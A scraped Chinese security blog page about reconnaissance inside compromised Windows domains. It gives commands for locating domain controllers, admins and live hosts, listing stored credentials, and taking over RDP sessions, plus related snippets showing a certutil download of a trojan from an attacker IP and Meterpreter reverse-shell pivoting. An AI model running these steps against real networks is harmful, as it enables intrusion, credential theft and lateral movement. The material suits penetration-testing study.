<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    域環境下的信息搜集(詳細)

    VSole2022-07-07 16:07:25

    01

    單域環境

    單域環境

    查看域環境用戶

    查看時間/dns服務器(一般為域控)

    net time /domain /net view /domain
    

    shell net group "Domain Controllers" /domain
    

    02

    查看域控制器

    查看域控制器

    可以得到域控制器IP地址

    域控還可能開放88 Kerberos 協議,01389 ldap,

    DNS 53 如果存在EXECHANGE 郵件服務器那么也開放了25還有我們熟悉的139,445.

    03

    查看身處在哪個域

    查看身處在哪個域

    net config workstaon
    

    shell nltest /dclist:de.org 同樣可以得到域控地址net group "domain admins" /domain 查看域管有哪些
    

    04

    信息收集

    信息收集:

    確定存在內網后可以使用

    for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.1.%I | findstr "TTL=“
    

    該命令批量ping 出存活的IP ,如果沒有存在策略限制一般Ping出存貨的IP都可以進行端口掃描等操作。

    同等可以使用 nbtscan /fscan等內網掃描工具替代。

    查看net use 有沒有IPC連過來的機器

    cmdkey /list 用戶憑據

    可以再

     net view \\xx
    

    查看有沒有開啟共享目錄。

    之后可以查看一下用戶進程查看有沒有其他用戶進程可以注入/竊取。

    echo %logonserver% 查看當前登錄域 quser 可以查詢 當前在線的user
    

    插播tips(3389 system權限 tscon 加id可以直接切換用戶無需知道密碼)。

    查找 文件 dir /s /b xxxx.exe

    插播tips2:

    如果不知道web目錄可以拿一個web的js來定位web位置

    cmd /c "for /f "delims=" %i in ('dir /s /b c:bsa.js') do (echo %i> %i.path.txt)&(ipconfig > %i.ipconfig.txt)"

    會在 js下生成一個txt 里邊有web的目錄地址域控常見命令:

    dsquery server - 查找目錄中的 AD DC/LDS 實例dsquery user - 查找目錄中的用戶dsquery computer 查
    

    主機發現系列:

    查看內網其他IP 3389 的登錄記錄

     arp -a
    

    如何使用域用戶查看當前用戶機器?用戶登錄主機?

    ADfind.exe,Psloggedon.exe,PvefindADuser.exe,powerview.
    

    ADfind使用方法

    查看DC機器

    查看域內在活動的機器

    AdFind.exe -sc computers_active name dnshostname
    

    查看詳細域內機器

    shell AdFind.exe -b dc=tide,dc=org -f "objectcategory=computer"
    

    查看能登陸的389以及機器

    shell AdFind.exe -h 192.168.100.10 -sc u:tideone userWorkstations
    

    使用PVEFindaduser查看當前用戶胡登錄的主機

    shell PVEFindaduser -current -nopingPVEFindADuser -current -target 192.168.91.133 查看指定IP的登錄記錄
    PVEFindADuser -last 查看上次
    
    域控制器shell
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    最近,一個名為Zerologon的嚴重漏洞–CVE-2020-1472–已成為全球范圍內的趨勢主題。從攻擊者的角度來看,與域控制器進行通信時,這種情況是可能的。為了利用這些潛在的漏洞,外部代理濫用了File-Manager插件中的漏洞–CVE-2020-25213,該漏洞允許在服務器端執行任意代碼。根據WordFence的數據,到2020年9月4日,記錄到超過170萬個站點受到攻擊,而到2020年9月10日,受攻擊的站點總數已超過260萬。同時,影響WP-Manager WordPress插件的CVE-2020-25213仍被犯罪分子利用。
    主要記錄拿到Shell后再反彈MSF Shell、Mimikatz抓取密碼以及登錄域控等內網部分。前面漏洞環境搭建及打點等不作記錄,可查看參考文章。攻擊機利用Python開啟HTTP服務$ python -m SimpleHTTPServer 8080. 靶機CMD下載木馬文件$ certutil.exe -urlcache -split -f http://<攻擊者IP>:8080/win.exe. [*] Started reverse TCP handler on <攻擊者IP>:<攻擊機監聽端口>. 并且需要遷移到權限為NT AUTHORITY\SYSTEM的進程,因為進程遷移后meterpreter的權限是遷移進程的權限。查看靶機位數&進程meterpreter > sysinfo # 查看位數。配置路由meterpreter > run autoroute -s 192.168.52.0/24. MS17-010掃一下MS17-010meterpreter > background # 后臺掛起Session
    域環境下的信息搜集
    2023-05-23 09:25:36
    單域環境查看域環境用戶查看時間/dns服務器net time /domain /net view /domain. 查看域控制器可以得到域控制器IP地址域控還可能開放88 Kerberos 協議,01389 ldap,DNS 53 如果存在EXECHANGE 郵件服務器那么也開放了25還有我們熟悉的139,445.查看身處在哪個域net?該命令批量ping 出存活的IP ,如果沒有存在策略限制一般Ping出存貨的IP都可以進行端口掃描等操作。同等可以使用 nbtscan /fscan等內網掃描工具替代。會在 js下生成一個txt 里邊有web的目錄地址域控常見命令:查找目錄中的?查看指定IP的登錄記錄PVEFindADuser -current -target 192.168.91.133
    在滲透測試的過程中,我們可以通過常見的漏洞來獲取shell,我們獲取到的shell通常是各個公司對外開放的網站以及APP應用等屬于外網(可以通過計算機直接訪問),如果我們想要獲取該公司內部的一些內部信息就要進入該公司的內部網絡(內網)本文將會對內網進行簡單介紹并且搭建一個簡單地內部網絡環境,來熟悉了解什么是內網。
    內網滲透TIPS總結
    2023-01-28 11:00:41
    內網基礎知識1、工作組:工作組是 局域網 中的一個概念,他是長久的資源管理模式。默認情況下使用工作組方式進行資源管理,將不同的 computer 按照不同的要求分類到不同的組。而實際上,因為域名的計算機是使用DNS 來定位域控制器、服務器及其他計算機、網絡服務的,所以域的名字就是DNS 域的名字。在內網滲透測試中,大都是通過尋找 DNS 服務器來確定域控制器的位置的。
    域環境下的信息搜集(詳細)
    黑客利用 Adob??e ColdFusion 漏洞入侵美國政府機構
    抓取域密碼哈希的各種工具集合。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类